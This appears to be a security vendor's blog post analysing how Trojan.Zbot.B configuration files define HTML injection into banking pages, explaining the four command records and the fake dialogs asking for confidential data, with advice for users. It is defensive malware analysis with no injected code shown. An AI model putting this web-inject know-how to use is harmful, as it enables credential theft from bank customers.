Following on from my previous blog exploring the structure of the Trojan.Zbot.B configuration files, we will now take a closer look at another command contained in the configuration file. In this case we will examine a command that injects HTML code into the Web browser.
This configuration block has four command records of 0010, 0020, 0004 and 0008. The command 0010 is used to search for HTML data matching this pattern:
<td><div class=”account-status”> and Self Triggered Debits -->.
The next command 0020 defines the text expression as to how the captured HTML data is expressed; %1 is a wildcard representing the real data. The command 0004 defines the condition for HTML injection to take place. In this sample, the HTML data would be inserted after a <head> tag. The last command 0008 defines the HTML data to be injected. The following is a snippet of injected HTML data.
Note that the attacker uses a legitimate Ajax code library provided by Google so that they can avoid writing their own code.
The code is injected into the Web page behind the scenes and then results are displayed to the user. In order to make the injected dialog box look more convincing, they also contain images and logos stolen from the various institutions. However, the URLs for the image files indicate that they are not hosted by the organizations to which they belong. Basically the Trojan is “borrowing” images from various websites and users would be none the wiser unless they looked at the underlying HTML code.
If your computer is compromised by Trojan.Zbot.B and you are visiting URLs targeted by the Trojan, the browser may show a Web page or a pop-up dialog box asking you to provide some confidential information. The following images are generated from the HTML data that is injected from the configuration files:
The tell-tale sign to spot potential danger when transacting online is to look for excessive information requirements or being asked to verify access to a service by providing personal information. These are fairly good signs that the request may be bogus. Remember, no reputable financial institutions will request you to disclose the PIN of your bank card over the Internet or even by phone.
A special thanks to Andrea Lelli for his technical assistance.